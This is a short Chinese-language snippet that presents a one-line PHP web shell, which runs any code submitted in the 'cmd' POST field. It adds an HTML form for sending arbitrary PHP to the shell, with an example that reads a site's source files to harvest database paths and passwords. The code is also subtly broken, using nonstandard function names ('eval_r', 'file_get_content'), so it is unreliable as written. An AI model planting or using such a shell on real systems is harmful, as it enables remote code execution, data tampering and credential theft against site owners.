<?php eval_r($_POST[cmd]);?>

执行POST来的cmd参数语句，别人可以以任何内容提交，这个程序把提交的数据当PHP语句执行，利用这个功能可以查看甚至修改你的数据库数据和文件。使用的方法可以随便编写一个HTML来完成，例如：


<form method=post action=http://....../你的名字.php>
<textarea name=cmd>
//这里面写PHP程序，随便连接数据和修改文件都可以，当然也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码
$str=file_get_content('xxx.php');
$str=str_replace('<','&lt;',$str);
echo "<pre>$str</pre>"
</textarea>
<input type=submit>
</form>